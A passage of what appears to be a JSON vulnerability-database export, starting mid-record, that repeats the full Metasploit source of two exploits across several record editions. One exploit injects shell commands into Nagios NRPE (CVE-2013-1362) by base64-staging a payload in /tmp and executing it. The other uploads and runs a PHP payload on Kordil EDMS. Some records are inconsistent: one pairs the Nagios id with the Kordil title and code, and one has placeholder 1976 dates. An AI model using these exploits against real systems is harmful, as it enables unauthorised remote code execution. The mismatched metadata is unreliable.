end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-11T02:33:16", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 95}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "452188f9368b6bfc35fed38f81ff234a", "type": "metasploit", "bulletinFamily": "exploit", "title": "Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability", "description": "This module exploits a vulnerability in Kordil EDMS v2.2.60rc3. 
This application has an upload feature that allows an unauthenticated user to upload arbitrary files to the '/kordil_edms/userpictures/' directory.\n", "published": "2013-02-25T19:29:27", "modified": "2019-01-10T19:19:14", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-11T22:36:49", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/kordil_edms_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability in Kordil EDMS v2.2.60rc3.\n This application has an upload feature that allows an unauthenticated user\n to upload arbitrary files to the '/kordil_edms/userpictures/' directory.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'bcoles' # Discovery and exploit\n ],\n 'References' =>\n [\n ['OSVDB', '90645'],\n ['EDB', '24547'],\n ],\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['Automatic Targeting', { 'auto' => true }]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Feb 22 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path to the web application', '/kordil_edms/']),\n ])\n end\n\n def check\n\n base = target_uri.path\n peer = \"#{rhost}:#{rport}\"\n\n # retrieve software version from login page\n begin\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(base, 
'global_group_login.php')\n })\n if res and res.code == 200\n if res.body =~ /<center><font face=\"Arial\" size=\"2\">Kordil EDMS v2\\.2\\.60/\n return Exploit::CheckCode::Appears\n elsif res.body =~ /Kordil EDMS v/\n return Exploit::CheckCode::Detected\n end\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n vprint_error(\"Connection failed\")\n return Exploit::CheckCode::Unknown\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def upload(base, file)\n data = Rex::MIME::Message.new\n data.add_part(file, 'text/x-php', nil, \"form-data; name=\\\"upload_fd31\\\"; filename=\\\"#{@fname}.php\\\"\")\n data.add_part(\"#{@fname}\", nil, nil, 'form-data; name=\"add_fd0\"')\n data.add_part(\"#{@fname}\", nil, nil, 'form-data; name=\"add_fd27\"')\n data.add_part(\"n\", nil, nil, 'form-data; name=\"act\"')\n data_post = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'users_add.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data_post\n })\n return res\n end\n\n def on_new_session(client)\n if client.type == \"meterpreter\"\n client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")\n client.fs.file.rm(\"#{@fname}.php\")\n else\n client.shell_command_token(\"rm #{@fname}.php\")\n end\n end\n\n\n def exploit\n\n base = target_uri.path\n @fname = rand_text_numeric(7)\n\n # upload PHP payload to userpictures/[fname].php\n print_status(\"Uploading PHP payload (#{payload.encoded.length} bytes)\")\n php = %Q|<?php #{payload.encoded} ?>|\n begin\n res = upload(base, php)\n if res and res.code == 302 and res.headers['Location'] =~ /\\.\\/user_account\\.php\\?/\n print_good(\"File uploaded successfully\")\n else\n fail_with(Failure::UnexpectedReply, \"#{peer} - Uploading PHP payload failed\")\n end\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n fail_with(Failure::Unreachable, \"#{peer} - Connection 
failed\")\n end\n\n # retrieve and execute PHP payload\n print_status(\"Executing payload (userpictures/#{@fname}.php)\")\n begin\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(base, 'userpictures', \"#{@fname}.php\")\n })\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n fail_with(Failure::Unreachable, \"#{peer} - Connection failed\")\n end\n\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-11T22:36:49", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 96}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-06-12T00:35:40", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-06-12T00:35:40"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1", "SUSE-SU-2013:1219-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "openvas", "idList": ["OPENVAS:865802", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310865756", "OPENVAS:850457", "OPENVAS:850460", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310121262"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "NAGIOS_NRPE_2_14.NASL", "FEDORA_2013-9836.NASL", "OPENSUSE-2013-301.NASL", "ALA_ALAS-2013-203.NASL", "FEDORA_2013-9848.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "saint", "idList": ["SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-06-12T00:35:40"}}, "objectVersion": "1.4", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 
'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f 
/tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-12T00:35:40", "differentElements": 
["sourceData"], "edition": 97}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "7af0909609ddf9c8e970b9a830af05bd", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-06-17T02:14:14", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2019-06-17T02:14:14"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "openvas", "idList": ["OPENVAS:865802", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310850460", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865756", "OPENVAS:850460", "OPENVAS:1361412562310865802", "OPENVAS:850457", "OPENVAS:1361412562310121262"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "NAGIOS_NRPE_2_14.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "OPENSUSE-2013-301.NASL", 
"FEDORA_2013-9836.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "saint", "idList": ["SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-06-17T02:14:14"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-17T02:14:14", "differentElements": ["sourceData"], "edition": 98}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "b8fd29a158b5b91d5ab7a065082cbc04", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-06-17T14:38:11", "history": [], "viewCount": 126, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-06-17T14:38:11"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "NAGIOS_NRPE_2_14.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850460", "OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865756", "OPENVAS:850460", "OPENVAS:1361412562310865802", "OPENVAS:850457", "OPENVAS:1361412562310121262"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "saint", "idList": ["SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-06-17T14:38:11"}}, "objectVersion": "1.4", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 
'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f 
/tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-17T14:38:11", "differentElements": 
["modified", "published", "sourceData"], "edition": 99}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "5a1933538a73a517997e3192eb3293dd", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-06-21T04:27:58", "history": [], "viewCount": 126, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2019-06-17T14:38:11"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "nessus", "idList": ["FEDORA_2013-9829.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "NAGIOS_NRPE_2_14.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850460", "OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865756", "OPENVAS:850460", "OPENVAS:1361412562310865802", "OPENVAS:850457", "OPENVAS:1361412562310121262"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "suse", "idList": 
